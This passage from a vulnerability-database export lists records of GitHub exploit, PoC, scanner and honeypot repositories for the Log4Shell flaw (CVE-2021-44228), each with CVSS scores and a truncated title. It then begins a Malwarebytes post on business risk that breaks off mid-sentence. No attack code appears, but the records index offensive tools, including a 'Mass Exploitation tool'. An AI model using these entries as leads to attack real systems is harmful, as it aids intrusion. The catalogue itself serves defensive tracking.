"privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-11T12:25:08", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T23:01:48", "id": "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:08", "description": "# docker-log4shell\n\nSimple Go app / Docker image for playing wit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T13:19:50", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T13:23:50", "id": "0E43C674-363B-53C2-8686-6F412A995AF4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-01T23:07:32", "description": "-My intention was to concieve of a novel, and effective, policy-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-01T20:01:01", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-01T20:01:06", "id": "D107A97F-1C44-59AB-8FFE-803D1DC21EA3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:14:32", "description": "# CVE-2021-44228\n\n## Vulnerability recurrence\n\n1....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T17:17:37", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T17:22:22", "id": "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-12T08:28:07", "description": "# log4jshell_CVE-2021-44228\nLog4jshell - CVE-2021-44228\n\n#### Ne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T09:56:30", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-12T06:44:17", "id": "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T23:56:09", "description": "# CVE-2021-44228-Mass-RCE\nCVE-2021-44228 Mass Exploitation tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:19:29", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-27T20:57:52", "id": "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-19T02:31:45", "description": "# CVE-2021-44228\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-23T03:18:26", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T01:20:25", "id": "0793D7AB-F57C-5832-B456-4057704CAEC9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-19T02:10:33", "description": "# log4j-scanner\nLog4j 2 (CVE-2021-44228) vulnerability scanner f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T22:11:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-19T01:59:07", "id": "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:08", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\n\n> [Affecte...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T10:17:13", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T10:17:47", "id": "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T23:17:01", "description": "# log4j (log4shell) CVE-2021-44228 Public IoCs list\n\nPublic IoCs...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T14:54:45", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T22:43:20", "id": "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:08:25", "description": "# CVE-2021-44228 PoC\n\nPoC for CVE-2021-44228. \n\nProject made for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T23:40:39", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T15:29:24", "id": "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T17:08:26", "description": "<h1>log4j</h1>\n<h4>An automated heade...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T19:15:00", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T15:10:52", "id": "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-15T09:25:50", "description": "# CVE-2021-44228 in Minecraft\n- Java 16\n- Paper server build #39...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T11:22:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T06:41:00", "id": "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T09:04:38", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-11T19:11:12", "description": "# log4fix\nThis tool is to detect and fix the log4j log4shell vul...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T11:54:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-08T08:26:51", "id": "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-25T02:36:25", "description": "# Searchable Log4j database\n Searchable page for [CISA Log4j (CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T03:37:03", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T00:10:31", "id": "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:49:34", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "7948E878-9BFE-5FEB-90AE-14C32290452F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-04T23:11:42", "description": "# Log4Shell Honeypot\n\nDockerized honeypot for [CVE-2021-44228](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T21:09:00", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T20:43:53", "id": "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "malwarebytes": [{"lastseen": "2021-12-16T12:38:51", "description": "As you may already know, the business, tech, and cybersecurity industries have been buzzing about Log4Shell (_[CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)_), aka Logjam, the latest software flaw in an earlier version of the Apache Log4j logging utility. As the name suggests, a logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nUnderstandably, this may be the first time you've been told explicitly about the Log4j tool, but what many don\u2019t realize is that hundreds of millions of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, rely on it. The software and online services you use in your business may be Java-based, too, thus opening you up for possible exploitation.\n\nExploiting this flaw allows hackers to worm their way into unpatched systems to take control. It\u2019s seriously bad to have this on any endpoint because of its ultra-wide attack surface and the accompanying damage potential that could bring.\n\n> Probably the worst since Heartbleed, I would say. \n \nThe attack surface is incredibly broad.\n> \n> -- April King ![\ud83c\udf00](https://s.w.org/images/core/emoji/13.1.0/72x72/1f300.png) (@CubicleApril) [December 10, 2021](<https://twitter.com/CubicleApril/status/1469435234462703619?ref_src=twsrc%5Etfw>)\n\n* * *\n\nRead everything you need to know about Log4Shell in our blog post, \n[_\u201cLog4j zero-day \u2018Log4Shell\u2019 arrives just in time to ruin your weekend.\u201d_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>)\n\n* * *\n\nBecause of all of this, there is a great need for businesses, particularly SMBs, to protect themselves against threats that take advantage of the Log4Shell vulnerability. Most certainly now that _[Microsoft has started seeing](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>)_ underground groups it dubs as "access brokers," those exploiting Log4Shell to infiltrate and gain initial access from target company networks in the hopes of selling them to ransomware threat actors.\n\nAccording to the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft 365 Defender Threat Intelligence Team, "We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms."\n\nRansomware is not the only concern here. Threat actors can also install [_cryptominers_](<https://blog.malwarebytes.com/glossary/miner/>), malware that turns devices into bots and making them part of a [botnet](<https://blog.malwarebytes.com/glossary/botnet/>)\u2014which Mirai [bot herders](<https://blog.malwarebytes.com/glossary/bot-herder/>) _[have already started doing](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>)_\u2014and [_Cobalt Strike_](<https://blog.malwarebytes.com/glossary/cobalt-strike/>), which cybercriminals abuse to perform network surveillance.\n\n### How can SMBs protect themselves from Log4j-enabled attacks?\n\nSMBs who use Linux can start off 